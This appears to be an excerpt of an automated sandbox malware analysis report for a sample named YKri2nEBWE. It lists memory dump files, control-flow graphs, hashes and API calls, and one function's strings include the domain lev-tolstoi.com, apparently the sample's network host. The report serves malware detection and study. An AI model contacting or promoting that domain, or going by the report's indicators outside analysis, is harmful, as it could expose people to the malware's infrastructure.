                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                    • API String ID: 0-1108506012
                                                                                                                                                                                                                                    • Opcode ID: 2705eebc883d9ba474ce5365f6ffd0fc3815efd1d8563c764a079af2cdd7e1cf
                                                                                                                                                                                                                                    • Instruction ID: 5023a0312d0e6b122eae2d21e0ab3ec6b9022052d92858a196ace507bc7001c7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2705eebc883d9ba474ce5365f6ffd0fc3815efd1d8563c764a079af2cdd7e1cf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3B1277264C7808BE3148A29CC8536FBFD297C5324F1D8B6DE5E9873C2C6B8C9858746
                                                                                                                                                                                                                                    Function 00C4CE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1043 c4ce45-c4ce78 call c73fd0 call c49780 CoUninitialize 1048 c4ce80-c4cee4 1043->1048 1048->1048 1049 c4cee6-c4cef7 1048->1049 1050 c4cf00-c4cf20 1049->1050 1050->1050 1051 c4cf22-c4cf64 1050->1051 1052 c4cf70-c4cf92 1051->1052 1052->1052 1053 c4cf94-c4cf9c 1052->1053 1054 c4cf9e-c4cfa2 1053->1054 1055 c4cfbb-c4cfc3 1053->1055 1056 c4cfb0-c4cfb9 1054->1056 1057 c4cfc5-c4cfc6 1055->1057 1058 c4cfdb-c4cfe6 1055->1058 1056->1055 1056->1056 1059 c4cfd0-c4cfd9 1057->1059 1060 c4cfec-c4cfed 1058->1060 1061 c4d08a 1058->1061 1059->1058 1059->1059 1062 c4cff0-c4cff9 1060->1062 1063 c4d08d-c4d095 1061->1063 1062->1062 1064 c4cffb 1062->1064 1065 c4d097-c4d09b 1063->1065 1066 c4d0ad 1063->1066 1064->1063 1067 c4d0a0-c4d0a9 1065->1067 1068 c4d0b0-c4d0bb 1066->1068 1067->1067 1071 c4d0ab 1067->1071 1069 c4d0bd-c4d0bf 1068->1069 1070 c4d0cb-c4d0d7 1068->1070 1072 c4d0c0-c4d0c9 1069->1072 1073 c4d0f1-c4d1b1 1070->1073 1074 c4d0d9-c4d0db 1070->1074 1071->1068 1072->1070 1072->1072 1076 c4d1c0-c4d1d2 1073->1076 1075 c4d0e0-c4d0ed 1074->1075 1075->1075 1077 c4d0ef 1075->1077 1076->1076 1078 c4d1d4-c4d1f4 1076->1078 1077->1073 1079 c4d200-c4d252 1078->1079 1079->1079 1080 c4d254-c4d26b call c4b7e0 1079->1080 1082 c4d270-c4d28a 1080->1082
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Uninitialize
                                                                                                                                                                                                                                    • String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
                                                                                                                                                                                                                                    • API String ID: 3861434553-1386727196
                                                                                                                                                                                                                                    • Opcode ID: 6b9cc2e30f9a6779b2f36d6a440f7664b509acd38744f4e99d26c0d0996f4e03
                                                                                                                                                                                                                                    • Instruction ID: 6e84ef37e08f398f748fc8a8c4fd8da496fa07e98d199b9ffa57821117b976d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b9cc2e30f9a6779b2f36d6a440f7664b509acd38744f4e99d26c0d0996f4e03
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09A103B42057818FD726CF29C4D0662BFE2FF96310B18859CC8E24F76AD739A846CB51
                                                                                                                                                                                                                                    Function 00C48600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1088 c48600-c48611 call c7d9a0 1091 c48617-c4861e call c762a0 1088->1091 1092 c48a48-c48a4b ExitProcess 1088->1092 1095 c48624-c4864a 1091->1095 1096 c48a31-c48a38 1091->1096 1104 c48650-c4887f 1095->1104 1105 c4864c-c4864e 1095->1105 1097 c48a43 call c7e080 1096->1097 1098 c48a3a-c48a40 call c47f60 1096->1098 1097->1092 1098->1097 1107 c48880-c488ce 1104->1107 1105->1104 1107->1107 1108 c488d0-c4891d call c7c540 1107->1108 1111 c48920-c48943 1108->1111 1112 c48964-c4897c 1111->1112 1113 c48945-c48962 1111->1113 1115 c48982-c48a0b 1112->1115 1116 c48a0d-c48a25 call c49d00 1112->1116 1113->1111 1115->1116 1116->1096 1119 c48a27 call c4cb90 1116->1119 1121 c48a2c call c4b7b0 1119->1121 1121->1096
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 00C48A4B
                                                                                                                                                                                                                                      • Part of subcall function 00C4B7B0: FreeLibrary.KERNEL32(00C48A31), ref: 00C4B7B6
                                                                                                                                                                                                                                      • Part of subcall function 00C4B7B0: FreeLibrary.KERNEL32 ref: 00C4B7D7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                    • String ID: b]u)$}$}
                                                                                                                                                                                                                                    • API String ID: 1614911148-2900034282
                                                                                                                                                                                                                                    • Opcode ID: 243291cbf1907dccc440ba7e7f09272a3b21f7dae6c4faf5620f2e1b3d47cf56
                                                                                                                                                                                                                                    • Instruction ID: 01d2ad26368da06b26f8099a1ddf05044929af739cb3c90e6874ea774a86f78f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 243291cbf1907dccc440ba7e7f09272a3b21f7dae6c4faf5620f2e1b3d47cf56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECC1F773E187144BC718DF69C84125AF7D6ABC8710F0EC52EA898EB395EA74DD048BC6
                                                                                                                                                                                                                                    Function 00C6D34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1139 c6d34a-c6d362 1140 c6d370-c6d382 1139->1140 1140->1140 1141 c6d384-c6d389 1140->1141 1142 c6d39b-c6d3a7 1141->1142 1143 c6d38b-c6d38f 1141->1143 1144 c6d3c1-c6d40f call c7fe00 GetPhysicallyInstalledSystemMemory 1142->1144 1145 c6d3a9-c6d3ab 1142->1145 1146 c6d390-c6d399 1143->1146 1151 c6d410-c6d44d 1144->1151 1147 c6d3b0-c6d3bd 1145->1147 1146->1142 1146->1146 1147->1147 1149 c6d3bf 1147->1149 1149->1144 1151->1151 1152 c6d44f-c6d498 call c5e960 1151->1152 1155 c6d4a0-c6d551 1152->1155 1155->1155 1156 c6d557-c6d55c 1155->1156 1157 c6d55e-c6d568 1156->1157 1158 c6d57d-c6d583 1156->1158 1160 c6d570-c6d579 1157->1160 1159 c6d586-c6d58e 1158->1159 1161 c6d590-c6d591 1159->1161 1162 c6d5ab-c6d5b3 1159->1162 1160->1160 1163 c6d57b 1160->1163 1164 c6d5a0-c6d5a9 1161->1164 1165 c6d5b5-c6d5b6 1162->1165 1166 c6d5cb-c6d611 1162->1166 1163->1159 1164->1162 1164->1164 1167 c6d5c0-c6d5c9 1165->1167 1168 c6d620-c6d653 1166->1168 1167->1166 1167->1167 1168->1168 1169 c6d655-c6d65a 1168->1169 1170 c6d65c-c6d65d 1169->1170 1171 c6d66d 1169->1171 1172 c6d660-c6d669 1170->1172 1173 c6d670-c6d67a 1171->1173 1172->1172 1174 c6d66b 1172->1174 1175 c6d67c-c6d67f 1173->1175 1176 c6d68b-c6d73c 1173->1176 1174->1173 1177 c6d680-c6d689 1175->1177 1177->1176 1177->1177
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00C6D3EE
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                    • String ID: ><+
                                                                                                                                                                                                                                    • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                    • Opcode ID: 34b971d35c7b69e3121194d2ac89ecec3dcd8ef93a4acb2eedcc41d82d1dff6b
                                                                                                                                                                                                                                    • Instruction ID: 41da4334c29c09285546f8f52421f82223d46d6e1c7f006760c5a210ae247a17
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34b971d35c7b69e3121194d2ac89ecec3dcd8ef93a4acb2eedcc41d82d1dff6b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7C1C275A047418FD725CF2AC490762FBE2BF9A310B28859ED4EB8B752C735E906CB50
                                                                                                                                                                                                                                    Function 00C80D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
